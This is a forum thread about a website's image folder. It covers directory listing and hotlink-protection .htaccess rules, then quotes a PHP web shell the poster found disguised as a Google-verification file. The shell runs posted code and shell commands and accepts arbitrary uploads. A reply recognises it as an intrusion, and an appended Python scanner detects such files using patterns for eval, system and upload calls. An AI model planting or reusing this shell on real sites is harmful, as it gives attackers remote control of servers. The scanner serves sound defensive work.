Problem with folder images, i can see it


blondu'

Posted

If the only problem is that random visitors can enter a directory (folder) in the browser, and see all the files in it, you can do one of two things: you can put in a dummy index.html in that directory (empty file or something trivial), or you can set your system to "disable indexing" via a control panel button or adding an Options -Indexes line to .htaccess.

 

Being able to see image files is not a security hazard, but you might not want visitors to see other kinds of files. Remember that anyone can view a page source and get the name and path of any image file, and directly call up that image. Adding "hotlink protection" that allows "empty" (command line) would prevent someone from doing that.

Posted

I fixed the problem with .htaccess

 

AuthUserFile /dev/null
AuthGroupFile /dev/null

RewriteEngine On

RewriteCond %{HTTP_REFERER} !^http://www.site.com.* [NC]
RewriteCond %{HTTP_REFERER} !^http://ma.osite.com.* [NC]
RewriteCond %{HTTP_REFERER} !^http://members.site.com.* [NC]
RewriteCond %{HTTP_REFERER} !^http://ochesite.com.* [NC]
RewriteCond %{HTTP_REFERER} !^http://911.222.111.111.* [NC]

RewriteRule /* http://osite.com/index.html [R,L]

 

Posted

And I have problems with the images folder. I found the folder goog1e5b6d6f1840c255.php

 

Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>

Posted

Looks like something a hacker might use to me.

 

It's not "normal" to have PHP files in your images folder (on most sites).

 

If you were an astronaut I would advise you to "get on the horn" and repeat the infamous words from Apollo 13:

 

"Houston... We have a problem...."

:'(

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -
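A check for what the reply above points out (PHP files do not belong in an images folder), as an added example that is not part of the original thread. It walks a directory and flags files with a script extension or with PHP code inside, including code hidden in a file named like an image; the extension list, the patterns and the sample files are assumptions constructed for the demonstration.

```python
import os
import re
import tempfile

# Extensions a PHP-enabled server may execute (assumed list; match it to your handler config).
SCRIPT_EXTS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}
# A PHP open tag, and the kinds of calls seen in the file quoted in this thread.
PHP_TAG = re.compile(rb"<\?(php|=)", re.I)
RISKY_CALL = re.compile(
    rb"\b(eval|system|exec|passthru|shell_exec|move_uploaded_file)\s*\(", re.I)

def scan_images_dir(root):
    """Return sorted (relative_path, reasons) for files that do not belong in an images folder."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = []
            if os.path.splitext(name)[1].lower() in SCRIPT_EXTS:
                reasons.append("script extension")
            with open(path, "rb") as fh:
                data = fh.read(1024 * 1024)  # the first 1 MiB covers small dropped scripts
            if PHP_TAG.search(data):
                reasons.append("php open tag")
                if RISKY_CALL.search(data):
                    reasons.append("code-exec or upload call")
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)

def demo():
    """Build a constructed images folder (inert sample files) and scan it."""
    samples = {
        "logo.gif": b"GIF89a" + b"\x00" * 32,                      # ordinary image
        "index.html": b"",                                         # dummy index file
        "banner.jpg": b"\xff\xd8\xff\xe0<?php eval($e); ?>",       # script inside an "image"
        "placeholder_name.php": b"<?php system($s); ?>",           # constructed stand-in
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        return scan_images_dir(root)

if __name__ == "__main__":
    for rel, reasons in demo():
        print(f"{rel}: {', '.join(reasons)}")
```

Binary image data can contain the open-tag bytes by chance, so treat a "php open tag" hit on its own as something to inspect rather than as proof.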

Archived

This topic is now archived and is closed to further replies.